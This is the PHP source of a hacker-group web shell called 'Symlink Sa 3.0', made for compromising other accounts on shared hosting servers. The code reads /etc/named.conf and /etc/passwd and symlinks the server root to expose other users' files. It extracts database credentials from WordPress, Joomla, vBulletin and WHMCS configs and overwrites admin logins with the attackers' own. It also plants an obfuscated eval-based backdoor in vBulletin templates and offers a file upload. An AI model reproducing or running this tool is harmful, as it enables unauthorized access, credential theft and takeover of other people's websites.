Symlink Sa 3.0
' ;
echo '
-:[ User & Domains & Symlink ]:-
' ;
echo '
';
if(isset($_REQUEST['sws']))
{
switch ($_REQUEST['sws'])
{
/// Domains + Scripts ///
case 'sec':
if(!@is_file('named.txt')){
$d00m = @file("/etc/named.conf");
}else{
$d00m = @file("named.txt");
}
if(!$d00m)
{
die ("
");
}
else
{
echo "
Domains | Script | ";
foreach($d00m as $dom){
flush();
flush();
if(eregi("zone",$dom)){
@preg_match_all('#zone "(.*)"#', $dom, $domsws);
flush();
if(@strlen(trim($domsws[1][0])) > 2){
$user = @posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
///////////////////////////////////////////////////////////////////////////////////
$wpl=$pageURL."/sym/root/home/".$user['name']."/public_html/wp-config.php";
$wpp=@get_headers($wpl);
$wp=$wpp[0];
$wp2=$pageURL."/sym/root/home/".$user['name']."/public_html/blog/wp-config.php";
$wpp2=@get_headers($wp2);
$wp12=$wpp2[0];
///////////////////////////////
$jo1=$pageURL."/sym/root/home/".$user['name']."/public_html/configuration.php";
$joo=@get_headers($jo1);
$jo=$joo[0];
$jo2=$pageURL."/sym/root/home/".$user['name']."/public_html/joomla/configuration.php";
$joo2=@get_headers($jo2);
$jo12=$joo2[0];
////////////////////////////////
$vb1=$pageURL."/sym/root/home/".$user['name']."/public_html/includes/config.php";
$vbb=@get_headers($vb1);
$vb=$vbb[0];
$vb2=$pageURL."/sym/root/home/".$user['name']."/public_html/vb/includes/config.php";
$vbb2=@get_headers($vb2);
$vb12=$vbb2[0];
$vb3=$pageURL."/sym/root/home/".$user['name']."/public_html/forum/includes/config.php";
$vbb3=@get_headers($vb3);
$vb13=$vbb3[0];
/////////////////
$wh1=$pageURL."/sym/root/home/".$user['name']."public_html/clients/configuration.php";
$whh2= @get_headers($wh1);
$wh=$whh2[0];
$wh2=$pageURL."/sym/root/home/".$user['name']."/public_html/support/configuration.php";
$whh2= @get_headers($wh2);
$wh12=$whh2[0];
$wh3=$pageURL."/sym/root/home/".$user['name']."/public_html/client/configuration.php";
$whh3= @get_headers($wh3);
$wh13=$whh3[0];
$wh5=$pageURL."/sym/root/home/".$user['name']."/public_html/submitticket.php";
$whh5= @get_headers($wh5);
$wh15=$whh5[0];
$wh4=$pageURL."/sym/root/home/".$user['name']."/public_html/client/configuration.php";
$whh4= @get_headers($wh4);
$wh14=$whh4[0];
////////////////////////////////////////////////////////////////////////////////
////////// Wordpress ////////////
$pos = strpos($wp, "200");
$config=" ";
if (strpos($wp, "200") == true )
{
$config="Wordpress";
}
elseif (strpos($wp12, "200") == true)
{
$config="Wordpress";
}
///////////WHMCS////////
elseif (strpos($jo, "200") == true and strpos($wh15, "200") == true )
{
$config=" WHMCS";
}
elseif (strpos($wh12, "200") == true)
{
$config =" WHMCS";
}
elseif (strpos($wh13, "200") == true)
{
$config =" WHMCS";
}
///////// Joomla to 4 ///////////
elseif (strpos($jo, "200") == true)
{
$config=" Joomla";
}
elseif (strpos($jo12, "200") == true)
{
$config=" Joomla";
}
//////////vBulletin to 4 ///////////
elseif (strpos($vb, "200") == true)
{
$config=" vBulletin";
}
elseif (strpos($vb12, "200") == true)
{
$config=" vBulletin";
}
elseif (strpos($vb13, "200") == true)
{
$config=" vBulletin";
}
else
{
continue;
}
flush();
flush();
/////////////////////////////////////////////////////////////////////////////////////
$site = $user['name'] ;
flush();
echo "".$domsws[1][0]." |
".$config." |
"; flush();
}
}
}
}
break;
/// user + domine + symlink ///
case 'sym':
if(!is_file('named.txt')){
$d00m = @file("/etc/named.conf");
}else{
$d00m = @file("named.txt");
}
if(!$d00m)
{
die ("");
}
else
{
echo "Domains | Users | symlink | ";
foreach($d00m as $dom){
if(eregi("zone",$dom)){
preg_match_all('#zone "(.*)"#', $dom, $domsws);
flush();
if(strlen(trim($domsws[1][0])) > 2){
$user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
flush();
$site = $user['name'] ;
@symlink("/","sym/root");
$site = $domsws[1][0];
$ir = 'ir';
$il = 'il';
if (preg_match("/.^$ir/",$domsws[1][0]) or preg_match("/.^$il/",$domsws[1][0]) )
{
$site = "".$domsws[1][0]."
";
}
echo "
|
".$user['name']."
|
symlink
|
";
flush();
flush();
}
}
}
}
break;
/// file symlink ///
case 'file':
echo'
The file path to symlink
';
$pfile = $_POST['file'];
$symfile = $_POST['symfile'];
$symlink = $_POST['symlink'];
if ($symlink)
{
@mkdir('sym1',0777);
$c = "Options Indexes FollowSymLinks \n DirectoryIndex ssssss.htm \n AddType txt .php \n AddHandler txt .php \n AddType txt .html \n AddHandler txt .html \n Options all \n Options \n Allow from all \n Require None \n Satisfy Any";
$f =@fopen ('sym1/.htaccess','w');
@fwrite($f , $c);
@symlink("$pfile","sym1/$symfile");
echo '
'.$symfile.'';
}
break;
/// bypass read
case 'read':
echo "read /etc/named.conf";
echo "
";
if(isset($_GET['save'])){
$cont = stripcslashes($_POST['file']);
$f = fopen('named.txt','w');
$w = fwrite($f,$cont);
if($w){
echo '
save has been successfully';
}
fclose($f);
}
break;
// passwd
case 'passwd':
if(isset($_GET['save']) and isset($_POST['file']) or @filesize('passwd.txt') > 0){
$cont = stripcslashes($_POST['file']);
if(!file_exists('passwd.txt')){
$f = @fopen('passwd.txt','w');
$w = @fwrite($f,$cont);
fclose($f);
}
if($w or @filesize('passwd.txt') > 0){
// * SHOW * //
echo "Users | symlink | FTP | ";
flush();
$fil3 = file('passwd.txt');
foreach ($fil3 as $f){
$u=explode(':', $f);
$user = $u['0'];
echo "
$user
|
Symlink
|
FTP
|
";
flush();
flush();
}
die ("");
}
}
echo "read /etc/passwd";
echo "
";
flush();
break;
case 'joomla':
/////////////////////////////////////////////////////////////////// xxxxxxxxxxxxxxxxxxx ////////////////////////////
if(isset($_POST['s'])){
$file = @file_get_contents('joomla.txt');
$ex = explode("\n",$file);
echo " domin | config | Result | ";
flush();
foreach ($ex as $exp){
$es = explode("||",$exp);
$config = $es[0];
$domin = $es[1];
$domins = trim($domin).'';
$readconfig = @file_get_contents(trim($config));
if(ereg('JConfig',$readconfig)){
$pass = ex($readconfig,'$password = \'',"';");
$userdb = ex($readconfig,'$user = \'',"';");
$db = ex($readconfig,'$db = \'',"';");
$fix = ex($readconfig,'$dbprefix = \'',"';");
$tab = $fix.'users';
$con = @mysql_connect('localhost',$userdb,$pass);
$db = @mysql_select_db($db,$con);
$query = @mysql_query("UPDATE `$tab` SET `username` ='sec-w.com'");
$query3 = @mysql_query("UPDATE `$tab` SET `password` ='44a0bcda611514625ba94e0b1c0bdaed:2iets9ydjR3iOdSuyvW54pIzyF9M1P5J'");
if ($query and $query3 ){$r = 'Succeed user [sec-w.com] pass [1]';}else{$r = 'failed';}
$domins = trim($domin).'';
echo "
$domin |
config | ".$r." |
";
flush();
}else{
echo "
$domin |
config | failed |
";
flush();
}
}
die();
}
if(!is_file('named.txt')){
$d00m = @file("/etc/named.conf");
flush();
}else{
$d00m = file("named.txt");
}
if(!$d00m)
{
die ("");
}
else
{
echo "
Domains | config | Result | ";
$f = fopen('joomla.txt','w');
foreach($d00m as $dom){
if(eregi("zone",$dom)){
preg_match_all('#zone "(.*)"#', $dom, $domsws);
if(strlen(trim($domsws[1][0])) > 2){
$user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
///////////////////////////////////////////////////////////////////////////////////
$wpl=$pageURL."/sym/root/home/".$user['name']."/public_html/configuration.php";
$wpp=get_headers($wpl);
$wp=$wpp[0];
$wp2=$pageURL."/sym/root/home/".$user['name']."/public_html/blog/configuration.php";
$wpp2=get_headers($wp2);
$wp12=$wpp2[0];
$wp3=$pageURL."/sym/root/home/".$user['name']."/public_html/joomla/configuration.php";
$wpp3=get_headers($wp3);
$wp13=$wpp3[0];
////////// joomla ////////////
$pos = strpos($wp, "200");
$config=" ";
if (strpos($wp, "200") == true )
{
$config= $wpl;
}
elseif (strpos($wp12, "200") == true)
{
$config= $wp2;
}
elseif (strpos($wp13, "200") == true)
{
$config= $wp3;
}
else
{
continue;
}
flush();
/////////////////////////////////////////////////////////////////////////////////////
$dom = $domsws[1][0];
$w = fwrite($f,"$config||$dom \n");
if($w){$r = 'Save';}else{$r = 'failed';}
echo "".$domsws[1][0]." |
config | ".$r." |
";
flush();
}
}
}
}
break;
case 'wp':
############################ index #########################3
######## admin ##########33
if(isset($_POST['s'])){
$file = @file_get_contents('wp.txt');
$ex = explode("\n",$file);
echo " domin | config | Result | ";
flush();
flush();
foreach ($ex as $exp){
$es = explode("||",$exp);
$config = $es[0];
$domin = $es[1];
$domins = trim($domin).'';
$readconfig = @file_get_contents(trim($config));
if(ereg('wp-settings.php',$readconfig)){
$pass = ex($readconfig,"define('DB_PASSWORD', '","');");
$userdb = ex($readconfig,"define('DB_USER', '","');");
$db = ex($readconfig,"define('DB_NAME', '","');");
$fix = ex($readconfig,'$table_prefix = \'',"';");
$tab = $fix.'users';
$con = @mysql_connect('localhost',$userdb,$pass);
$db = @mysql_select_db($db,$con);
$query = @mysql_query("UPDATE `$tab` SET `user_login` ='sec-w.com'") or die;
$query = @mysql_query("UPDATE `$tab` SET `user_pass` ='$1$4z/.5i..$9aHYB.fUHEmNZ.eIKYTwx/'") or die;
if ($query){$r = 'Succeed user [sec-w.com] pass [1]';}
else
{
$r = 'failed';
}
$domins = trim($domin).'';
echo "
$domin |
config | ".$r." |
";
flush();
flush();
}else{
echo "
$domin |
config | failed2 |
";
flush();
flush();
}
}
die();
}
if(!is_file('named.txt')){
$d00m = @file("/etc/named.conf");
}else{
$d00m = @file("named.txt");
}
if(!$d00m)
{
die ("");
}
else
{
echo "
Domains | config | Result | ";
flush();
flush();
$f = fopen('wp.txt','w');
foreach($d00m as $dom){
if(eregi("zone",$dom)){
preg_match_all('#zone "(.*)"#', $dom, $domsws);
if(strlen(trim($domsws[1][0])) > 2){
$user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
///////////////////////////////////////////////////////////////////////////////////
$wpl=$pageURL."/sym/root/home/".$user['name']."/public_html/wp-config.php";
$wpp=get_headers($wpl);
$wp=$wpp[0];
$wp2=$pageURL."/sym/root/home/".$user['name']."/public_html/blog/wp-config.php";
$wpp2=get_headers($wp2);
$wp12=$wpp2[0];
$wp3=$pageURL."/sym/root/home/".$user['name']."/public_html/wp/wp-config";
$wpp3=get_headers($wp3);
$wp13=$wpp3[0];
////////// wp ////////////
$pos = strpos($wp, "200");
$config=" ";
if (strpos($wp, "200") == true )
{
$config= $wpl;
}
elseif (strpos($wp12, "200") == true)
{
$config= $wp2;
}
elseif (strpos($wp13, "200") == true)
{
$config= $wp3;
}
else
{
continue;
}
flush();
/////////////////////////////////////////////////////////////////////////////////////
$dom = $domsws[1][0];
$w = fwrite($f,"$config||$dom \n");
if($w){$r = 'Save';}else{$r = 'failed';}
echo "".$domsws[1][0]." |
config | ".$r." |
";
flush();
flush();
flush();
}
}
}
}
break;
case 'vb':
if(isset($_POST['s'])){
$file = @file_get_contents('vb.txt');
$ex = explode("\n",$file);
echo " domin | config | Result | ";
foreach ($ex as $exp){
$es = explode("||",$exp);
$config = $es[0];
$domin = $es[1];
$domins = trim($domin).'';
$readconfig = @file_get_contents(trim($config));
if(ereg('vBulletin',$readconfig)){
$db = ex($readconfig,'$config[\'Database\'][\'dbname\'] = \'',"';");
$userdb = ex($readconfig,'$config[\'MasterServer\'][\'username\'] = \'',"';");
$pass = ex($readconfig,'$config[\'MasterServer\'][\'password\'] = \'',"';");
$con = @mysql_connect('localhost',$userdb,$pass);
$db = @mysql_select_db($db,$con);
$shell = "bVDPS8MwFL4L/g+vYZAWdPPiaUv14kAQFKqnUUqapjSYNKFJxCn7322abgzcIfDyvl+P7/qKs04D3tS5sJ96MMJ9b+ohDw8vTWcq31PF02yJp/WqzvEaZk2rBwWUOaF7ghAo7jrdEGS0dQh4z9zecIKUl04YOrhV4N821FEEwZQgb6SmDR8QiObsdxYheuMdRKNWSH5UxtmKn3G+v0P5TIxgNTqhWWR9rYSLAXH/RaUfgY8pbVROZ4VI0aawqN5ei/cdDlRcAiFwJEIGv4HyyLTZp4tq+/zyVOxwOASXO+yUqUI6Lm/gHxiBLDic6o62UHjGuLWQJEko99T9Gg7ApeUXJFsq5EX+AR7yPw==" ;
$crypt = "{\${eval(gzinflate(base64_decode(\'";
$crypt .= "$shell";
$crypt .= "\')))}}{\${exit()}}";
$sqlfaq = "UPDATE template SET template ='".$crypt."' WHERE title ='FAQ'" ;
$query = @mysql_query($sqlfaq,$con);
if ($query){$r = 'Succeed shell in search.php';}
else
{
$r = 'failed';
}
$domins = trim($domin).'';
echo "
$domin |
config | ".$r." |
";
}else{
echo "
$domin |
config | failed2 |
";
}
}
die();
}
if(!is_file('named.txt')){
$d00m = file("/etc/named.conf");
}else{
$d00m = file("named.txt");
}
if(!$d00m)
{
die ("");
}
else
{
echo "
Domains | config | Result | ";
$f = fopen('vb.txt','w');
foreach($d00m as $dom){
if(eregi("zone",$dom)){
preg_match_all('#zone "(.*)"#', $dom, $domsws);
if(strlen(trim($domsws[1][0])) > 2){
$user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
///////////////////////////////////////////////////////////////////////////////////
$wpl=$pageURL."/sym/root/home/".$user['name']."/includes/config.php";
$wpp=get_headers($wpl);
$wp=$wpp[0];
$wp2=$pageURL."/sym/root/home/".$user['name']."/vb/includes/config.php";
$wpp2=get_headers($wp2);
$wp12=$wpp2[0];
$wp3=$pageURL."/sym/root/home/".$user['name']."/forum/includes/config.php";
$wpp3=get_headers($wp3);
$wp13=$wpp3[0];
////////// vb ////////////
$pos = strpos($wp, "200");
$config=" ";
if (strpos($wp, "200") == true )
{
$config= $wpl;
}
elseif (strpos($wp12, "200") == true)
{
$config= $wp2;
}
elseif (strpos($wp13, "200") == true)
{
$config= $wp3;
}
else
{
continue;
}
flush();
/////////////////////////////////////////////////////////////////////////////////////
$dom = $domsws[1][0];
$w = fwrite($f,"$config||$dom \n");
if($w){$r = 'Save';}else{$r = 'failed';}
echo "".$domsws[1][0]." |
config | ".$r." |
";
flush();
}
}
}
}
break;
case 'help':
echo "
function | Case | ";
$safe_mode = ini_get('safe_mode');
if($safe_mode){$r = "False";}else{$r = "True";}
echo "Safe Mode | $r | ";
$fun = function_exists('symlink');
if(!$fun){$r = "False";}else{$r = "True";}
echo "
function symlink | $r | ";
$fun = function_exists('file');
if(!$fun){$r = "False";}else{$r = "True";}
echo "
function file | $r | ";
$fun = function_exists('file_get_contents');
if(!$fun){$r = "False";}else{$r = "True";}
echo "
function file_get_contents | $r | ";
$fun = function_exists('mkdir');
if(!$fun){$r = "False";}else{$r = "True";}
echo "
function mkdir | $r | ";
$fun = is_dir('sym/root');
if(!$fun){$r = "False";}else{$r = "True";}
echo "
Permission denied | $r | ";
$fun = preg_match('/Forbidden/',@file_get_contents('sym/root') or !@file_get_contents('sym/root'));
if($fun){$r = "False";}else{$r = "True";}
echo "
Forbidden | $r | ";
echo "
";
break;
default:
header("Location: $pg");
}
/// home ///
}else
{
echo '
';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '
Uploaded successful !!
'; }
else { echo '
Not uploaded !!
'; }
}
echo '
Cod3d by S3n4t00r Idea by Mr.Alsa3ek
Sec-w.Com
Muslims Hackers
';
}
function ex($text,$a,$b){
$explode = explode($a,$text);
$explode = explode($b,$explode[1]);
return $explode[0];
}
echo '
الحمايه
عالم الحمايه